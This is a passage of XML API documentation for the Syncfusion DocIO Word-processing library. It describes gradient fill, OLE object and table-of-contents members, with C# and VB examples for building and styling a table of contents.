        <member name="T:Syncfusion.DocIO.DLS.GradientFill">
            <summary>
            Summary description for GradientFill.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GradientFill.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.GradientFill"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GradientFill.Clone">
            <summary>
            Clones this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GradientFill.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.RotateWithShape">
            <summary>
            Gets or sets a value indicating whether [rotate with shape].
            </summary>
            <value><c>true</c> if [rotate with shape]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.Flip">
            <summary>
            Gets or sets the flip.
            </summary>
            <value>The flip.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.GradientStops">
            <summary>
            Gets the gradient stops.
            </summary>
            <value>The gradient stops.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.LinearGradient">
            <summary>
            Gets or sets the linear gradient.
            </summary>
            <value>The linear gradient.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.PathGradient">
            <summary>
            Gets or sets the path gradient.
            </summary>
            <value>The path gradient.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.TileRectangle">
            <summary>
            Gets the tile rectangle.
            </summary>
            <value>The tile rectangle.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientFill.IsEmptyElement">
             <summary>
            Gets/Sets the boolean flag when it is empty element
             </summary>
             <value>The tile rectangle.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.GradientStop">
            <summary>
            Summary description for GradientFill.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GradientStop.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.GradientStop"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GradientStop.Clone">
            <summary>
            Clones the Tile Rectangle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientStop.Position">
            <summary>
            Gets or sets the position.
            </summary>
            <value>The position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientStop.Color">
            <summary>
            Gets or sets the color.
            </summary>
            <value>The color.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.GradientStop.Opacity">
            <summary>
            Gets or sets the opacity.
            </summary>
            <value>The opacity.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LinearGradient">
            <summary>
            Summary description for LinearGradient.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.LinearGradient.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.LinearGradient"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.LinearGradient.Clone">
            <summary>
            Clones the Tile Rectangle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LinearGradient.Angle">
            <summary>
            Gets or sets the angle.
            </summary>
            <value>The angle.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.LinearGradient.Scaled">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.LinearGradient"/> is scaled.
            </summary>
            <value><c>true</c> if scaled; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PathGradient">
            <summary>
            Summary description for PathGradient.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PathGradient.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.PathGradient"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PathGradient.Clone">
            <summary>
            Clones the Tile Rectangle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PathGradient.PathShade">
            <summary>
            Gets or sets the path shade.
            </summary>
            <value>The path shade.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PathGradient.BottomOffset">
            <summary>
            Gets or sets the bottom offset.
            </summary>
            <value>The bottom offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PathGradient.LeftOffset">
            <summary>
            Gets or sets the left offset.
            </summary>
            <value>The left offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PathGradient.RightOffset">
            <summary>
            Gets or sets the right offset.
            </summary>
            <value>The right offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PathGradient.TopOffset">
            <summary>
            Gets or sets the top offset.
            </summary>
            <value>The top offset.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TileRectangle">
            <summary>
            Summary description for TileRectangle.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TileRectangle.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TileRectangle"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TileRectangle.Clone">
            <summary>
            Clones the Tile Rectangle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TileRectangle.BottomOffset">
            <summary>
            Gets or sets the bottom offset.
            </summary>
            <value>The bottom offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TileRectangle.LeftOffset">
            <summary>
            Gets or sets the left offset.
            </summary>
            <value>The left offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TileRectangle.RightOffset">
            <summary>
            Gets or sets the right offset.
            </summary>
            <value>The right offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TileRectangle.TopOffset">
            <summary>
            Gets or sets the top offset.
            </summary>
            <value>The top offset.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TileRectangle.HasAttributes">
            <summary>
            Gets or sets value when the 
            </summary>
            <value>The top offset.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WOleObject">
            <summary>
            Represents the OLE object in the Word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.ParseObjectPool(System.IO.Stream)">
            <summary>
            Parses the object pool.
            </summary>
            <param name="objectPoolStream">The object pool stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.UpdateStorageName">
            <summary>
            Update OleObject storage name
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.ParseOlePartStream(System.IO.Stream)">
            <summary>
            Parses the OLE part stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.ParseStreams(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Parses the streams.
            </summary>
            <param name="storage">The storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.ParseOleStream(System.IO.Stream)">
            <summary>
            Parses the OLE stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.CheckObjectInfoStream">
            <summary>
            Checks the object info stream exists. Add new object info stream if not exists.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.CreateOleObjContainer(System.Byte[],System.String)">
            <summary>
            Creates the OLE obj container.
            </summary>
            <param name="nativeData">The native data.</param>
            <param name="dataPath">The data path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.GetOlePartStream">
            <summary>
            Gets the OLE part stream.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.IsNativeItem">
            <summary>
            Determines whether [is native item].
            </summary>
            <returns>
            	<c>true</c> if [is native item]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.WriteToStorage(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Writes to storage.
            </summary>
            <param name="storage">The storage.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.UpdateGuid(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,System.Int32)">
            <summary>
            Updates the GUID.
            </summary>
            <param name="cmpFile">The CMP file.</param>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.GetOleContainer">
            <summary>
            Gets the OLE container stream.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.UpdateProps">
            <summary>
            Updates the ole object properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.SetOlePicture(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Sets the OLE picture.
            </summary>
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.SetLinkType(Syncfusion.DocIO.DLS.OleLinkType)">
            <summary>
            Sets the type of the OLE.
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.SetFieldType">
            <summary>
            Sets the type of the field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.UpdateOleObjInfoStream">
            <summary>
            Update Ole object ObjInfo stream with Display as icon data
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.UpdateObjInfoBytes">
            <summary>
            Update Object info 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.Detach">
            <summary>
            Detaches itself
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WOleObject.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.DisplayAsIcon">
            <summary>
            Gets or sets a value indicating whether the OLE object is displayed as an icon or content. 
            </summary>
            <value><b>True</b> if the OLE object is displayed as an icon; otherwise, <b>false</b>.</value>
            <remarks><para>Initially DocIO generated documents display the icon (given image) in place of the embedded OLE instance. </para>
            <para>By setting the DisplayAsIcon property to true, the icon is not updated after opening or editing the OLE instance by using Microsoft Word.</para> 
            <para>However, setting the DisplayAsIcon property to false enables the Word document to update the icons dynamically with the content after opening or editing the OLE instance.</para></remarks>
            <seealso cref="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.String,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.OlePicture">
            <summary>
            Gets the OLE picture. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance that represents the OLE picture.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.Container">
            <summary>
            Gets the OLE storage container as stream. Read-only.
            </summary>
            <value>The <see cref="T:System.IO.Stream"/> that represents the storage container of OLE object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.Field">
            <summary>
            Gets or sets the field.
            </summary>
            <value>The field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.OleStorageName">
            <summary>
            Gets or sets the name of the OLE Object storage.
            </summary>
            <value>The <b>string </b> that specifies the name of the OLE storage.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.LinkPath">
            <summary>
            Gets or sets the link path of the OLE object.
            </summary>
            <value>The <b>string </b>that specifies the link address.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.LinkType">
            <summary>
            Gets the type of the OLE object. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.OleLinkType"/> member that specifies the type of the OLE object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.OleXmlItem">
            <summary>
            Gets or sets the not parsed from docx ole object.
            </summary>
            <value>The XmlParagraphItem.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.OleObjectType">
            <summary>
            Gets the type of the OLE object.
            </summary>
            <value>The type of the OLE object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.ObjectType">
            <summary>
            Gets or sets the type of the OLE object.
            </summary>
            <value>The <b>string</b> that specifies the type of the OLE object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.NativeData">
            <summary>
            Gets the native data of embedded OLE object. Read-only.
            </summary>
            <value>The byte array that specifies the native data.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.OleObject">
            <summary>
            Gets the OLE object.
            </summary>
            <value>The OLE object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.NextOleObjId">
            <summary>
            Gets the next OLE object id.
            </summary>
            <value>The next OLE obj id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.PackageFileName">
            <summary>
            Gets the name of file embedded in the package(only if OleType is "Package"). Read-only.
            </summary>
            <value>The <b>string</b> that represents the file name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.IsEmpty">
            <summary>
            Gets a value indicating whether this instance is empty.
            </summary>
            <value><c>true</c> if this instance is empty; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WOleObject.Guid">
            <summary>
            Gets the GUID.
            </summary>
            <value>The GUID.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TableOfContent">
            <summary>
            Represent a table of contents in the Word document.
            </summary>
            <example><para>The following example illustrates how to add table of contents to a Word document.</para>
            <code lang = "C#">
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into the Word document
                IWSection section = document.AddSection();
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Add the paragraph into the created section
                IWParagraph paragraph = section.AddParagraph();
                //Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
                paragraph.AppendTOC(1, 3);
                //Add the section into the Word document
                section = document.AddSection();
               //Add the paragraph into the created section
                paragraph = section.AddParagraph(); 
                //Add the text for the headings
                paragraph.AppendText("First Chapter");
                //Set a build in heading style.
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add the text into the paragraph
                section.AddParagraph().AppendText(paraText);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph();
                //Add the text for the headings
                paragraph.AppendText("Second Chapter");
                //Set a build in heading style.
                paragraph.ApplyStyle(BuiltinStyle.Heading2);
                //Add the text into the paragraph
                section.AddParagraph().AppendText(paraText);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph();
                //Add the text into the headings
                paragraph.AppendText("Third Chapter");
                //Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading3);
                //Add the text into the paragraph.
                section.AddParagraph().AppendText(paraText);
                //Update the table of contents
                document.UpdateTableOfContents();
                //Save and close the Word document instance
               document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            </code>
            <code language = "VB">
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into the Word document
                Dim section As IWSection = document.AddSection()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Add the paragraph into the created section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
                paragraph.AppendTOC(1, 3)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text for the headings
                paragraph.AppendText("First Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add the text into the paragraph.
                section.AddParagraph().AppendText(paraText)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text for the headings
                paragraph.AppendText("Second Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading2)
                'Add the text into the paragraph
                section.AddParagraph().AppendText(paraText)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text into the headings
                paragraph.AppendText("Third Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading3)
                'Add the text into the paragraph
                section.AddParagraph().AppendText(paraText)
                'Update the table of contents
                document.UpdateTableOfContents()
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance and switches.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
            <param name="switches">The <b>string </b> that specifies the formatting string of the TOC field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.SetTOCLevelStyle(System.Int32,System.String)">
            <summary>
            Sets the style for the TOC level.
            </summary>
            <param name="levelNumber">The level number of the table of contents.</param>
            <param name="styleName">The name of the style to apply.</param>
            <example>
            <para>The following code illustrates how to set the style for the TOC level.</para>
            <code language = "C#">
            //Create a new Word document
            WordDocument document = new WordDocument();
            //Create a new custom styles
            Style style = (WParagraphStyle)document.AddParagraphStyle("Mystyle");
            style.CharacterFormat.Bold = true;
            style.CharacterFormat.FontName = "Verdana";
            style.CharacterFormat.FontSize = 25;
            //Add the section into the Word document
            IWSection section = document.AddSection();
            string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
            //Add the paragraph into the created section
            IWParagraph paragraph = section.AddParagraph();
            //Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
            TableOfContent toc = paragraph.AppendTOC(1, 3);
            toc.UseHeadingStyles = false;
            //Set the TOC level style based on which the TOC should be created
            toc.SetTOCLevelStyle(2, "Mystyle");
            //Add the section into the Word document
            section = document.AddSection();
            //Add the paragraph into the created section
            paragraph = section.AddParagraph();
            //Add the text for the headings
            paragraph.AppendText("First Chapter");
            //Set the build in heading style
            paragraph.ApplyStyle("Mystyle");
            //Add the text into the paragraph
            section.AddParagraph().AppendText(paraText);
            //Add the section into the Word document
            section = document.AddSection();
            //Add the paragraph into the created section
            paragraph = section.AddParagraph();
            //Add the text for the headings
            paragraph.AppendText("Second Chapter");
            //Set the build in heading style
            paragraph.ApplyStyle(BuiltinStyle.Heading1);
            //Add the text to the paragraph
            section.AddParagraph().AppendText(paraText);
            //Add the section into Word document
            section = document.AddSection();
            //Add a paragraph to created section
            paragraph = section.AddParagraph();
            //Add the text for the headings
            paragraph.AppendText("Third Chapter");
            //Set the build in heading style
            paragraph.ApplyStyle("Mystyle");
            //Add the text to the paragraph
            section.AddParagraph().AppendText(paraText);
            //Update the table of contents
            document.UpdateTableOfContents();
            //Save and close the Word document instance
            document.Save("Sample.docx", FormatType.Docx);
            document.Close();
            </code>
            <code language = "VB">
            'Create a new Word document
            Dim document As New WordDocument()
            'Create a new custom styles
            Dim style As Style = DirectCast(document.AddParagraphStyle("Mystyle"), WParagraphStyle)
            style.CharacterFormat.Bold = True
            style.CharacterFormat.FontName = "Verdana"
            style.CharacterFormat.FontSize = 25
            'Add the section into the Word document
            Dim section As IWSection = document.AddSection()
            Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
            'Add the paragraph into the created section
            Dim paragraph As IWParagraph = section.AddParagraph()
            'Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determine the TOC entries
            Dim toc As TableOfContent = paragraph.AppendTOC(1, 3)
            toc.UseHeadingStyles = False
            'Set the TOC level style based on which the TOC should be created
            toc.SetTOCLevelStyle(2, "Mystyle")
            'Add the section into the Word document
            section = document.AddSection()
            'Add the paragraph into the created section
            paragraph = section.AddParagraph()
            'Add the text for the headings
            paragraph.AppendText("First Chapter")
            'Set the build in heading style
            paragraph.ApplyStyle("Mystyle")
            'Add the text into the paragraph
            section.AddParagraph().AppendText(paraText)
            'Add the section into the Word document
            section = document.AddSection()
            'Add the paragraph into the created section
            paragraph = section.AddParagraph()
            'Add the text for the headings
            paragraph.AppendText("Second Chapter")
            'Set the build in heading style
            paragraph.ApplyStyle(BuiltinStyle.Heading1)
            'Add the text to the paragraph
            section.AddParagraph().AppendText(paraText)
            'Add the section into Word document
            section = document.AddSection()
            'Add a paragraph to created section
            paragraph = section.AddParagraph()
            'Add the text for the headings
            paragraph.AppendText("Third Chapter")
            'Set the build in heading style
            paragraph.ApplyStyle("Mystyle")
            'Add the text to the paragraph
            section.AddParagraph().AppendText(paraText)
            'Update the table of contents
            document.UpdateTableOfContents()
            �Save and close the Word document instance
            document.Save("Sample.docx", FormatType.Docx)
            document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetTOCLevelStyle(System.Int32)">
            <summary>
            Returns the name of the style applied to the specified TOC level.
            </summary>
            <param name="levelNumber">The level number of the table of contents.</param>
            <returns>The name of the style.</returns>
            <example>
            <para>The following example illustrates how to get the name of the style applied to the TOC level.</para>
            <code language = "C#">
                //Load a Word document
                WordDocument document = new WordDocument("Template.docx");
                WTextBody textBody = document.Sections[0].Body;
                WParagraph paragraph = textBody.Paragraphs[0];
                //Get the TOC item from the paragraph
                TableOfContent toc = paragraph.ChildEntities[0] as TableOfContent;
                //Gets the style name for the specified level
                string styleName = toc.GetTOCLevelStyle(1);            
                WParagraphStyle style = document.Styles.FindByName(styleName) as WParagraphStyle;
                //Modify the character format of the style
                style.CharacterFormat.HighlightColor = Color.LightGray;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            </code>
            <code language = "VB">
                'Load a Word document
                Dim document As New WordDocument("Template.docx")
                Dim textBody As WTextBody = document.Sections(0).Body
                Dim paragraph As WParagraph = textBody.Paragraphs(0)
                'Get the TOC item from the paragraph
                Dim toc As TableOfContent = TryCast(paragraph.ChildEntities(0), TableOfContent)
                'Gets the style name for the specified level
                Dim styleName As String = toc.GetTOCLevelStyle(1)
                Dim style As WParagraphStyle = TryCast(document.Styles.FindByName(styleName), WParagraphStyle)
                'Modify the character format of the style
                style.CharacterFormat.HighlightColor = Color.LightGray
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetTOCLevelStyles(System.Int32)">
            <summary>
            Returns the list of styles defined for the specified TOC level.
            </summary>
            <param name="levelNumber">The level number of the table of contents.</param>
            <returns>The collection of styles defined for the specified TOC level.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseSwitches">
            <summary>
            Parses the switches.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.GetBuiltinStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Gets the built-in style.
            </summary>
            <param name="builtinStyle">The built-in style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CreateDefStylesColl">
            <summary>
            Creates the default styles collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateFormattingString">
            <summary>
            Updates the formatting string of TOC field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateTOCLevels">
            <summary>
            Updates TOC heigher and lower levels.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateHyperlinks">
            <summary>
            Updates the hyperlinks.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateUsePageNumbers">
            <summary>
            Updates the formatting string with UsePageNumbers value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdatePageNumberAlign">
            <summary>
            Updates the page number alignment.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateUseOutlineLevels">
            <summary>
            Updates the use outline levels property in formatting string.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateUseField">
            <summary>
            Updates the use table entry field property.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.UpdateHeaderStyles">
            <summary>
            Updates the header styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseHeadingLevels(System.String)">
            <summary>
            Parses the heading levels.
            </summary>
            <param name="optionString">The option string.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseNumberAlignment(System.String)">
            <summary>
            Parses the number alignment.
            </summary>
            <param name="optionString">The option string.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseUseField(System.String)">
            <summary>
            Parses the use field.
            </summary>
            <param name="optionString">The option string.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.ParseHeaderStyles(System.String,System.Boolean)">
            <summary>
            Parses the header styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.OnChange">
            <summary>
            Called when [set value].
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.OnGetValue">
            <summary>
            Called when [get value].
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.SetStyleForTOCLevel(System.Int32,System.String,System.Boolean)">
            <summary>
            Sets the style for TOC level.
            </summary>
            <param name="levelNumber">The level number.</param>
            <param name="styleName">Name of the style.</param>
            <param name="onSetProperty">if it is on set property, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableOfContent.CheckLevelNumber(System.String,System.Int32)">
            <summary>
            Checks the level number.
            </summary>
            <param name="parameterName">Name of the parameter.</param>
            <param name="levelNumber">The level number.</param>
        </member>
